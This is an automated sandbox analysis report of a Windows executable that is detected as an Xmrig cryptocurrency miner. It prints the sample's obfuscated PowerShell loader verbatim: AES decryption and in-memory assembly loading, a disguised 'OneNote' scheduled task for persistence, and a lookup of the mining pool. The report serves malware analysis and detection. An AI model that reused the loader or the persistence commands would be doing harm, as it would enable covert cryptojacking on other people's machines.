Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1428499
MD5:6d075d047098d57266aa59b97d288bda
SHA1:1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
SHA256:fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
Tags:exe
Infos:

Detection

Xmrig
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Very long command line found
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D075D047098D57266AA59B97D288BDA)
    • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk') MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7180 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 7792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 1228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man') MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 6700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7560 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Network64476Man.cmd
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7660, ProcessName: powershell.exe

    Snort Signatures

    Timestamp:04/19/24-03:21:07.355283
    SID:2036289
    Source Port:57977
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
    Multi AV Scanner detection for submitted file
    Source: file.exeReversingLabs: Detection: 21%

    Bitcoin Miner

    barindex
    Yara detected Xmrig cryptocurrency miner
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbq source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbR source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBM source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbF source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb$ source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB" source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb| source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000017.00000002.2234254487.000001DF2EFE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb; source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb7 source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbS source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdbM source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbI source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbjS source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1763356691.00000217EA796000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbW source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbF source: powershell.exe, 00000017.00000002.2234695420.000001DF2EFFB000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A36407C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A38FC20 FindFirstFileExA,0_2_00007FF65A38FC20

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:57977 -> 1.1.1.1:53
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownDNS traffic detected: queries for: pool.hashvault.pro
    Source: powershell.exe, 00000017.00000002.2153655366.000001DF16876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000008.00000002.1839958983.0000024098D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftr
    Source: powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217803E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1938585602.00000240B2E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000008.00000002.1940934137.00000240B2EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co0
    Source: powershell.exe, 00000018.00000002.2558198678.000001EBD2EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coQ
    Source: powershell.exe, 0000001B.00000002.2623470775.0000013D002DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
    Source: powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16EAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000018.00000002.2316867721.000001EBBB5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB5AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
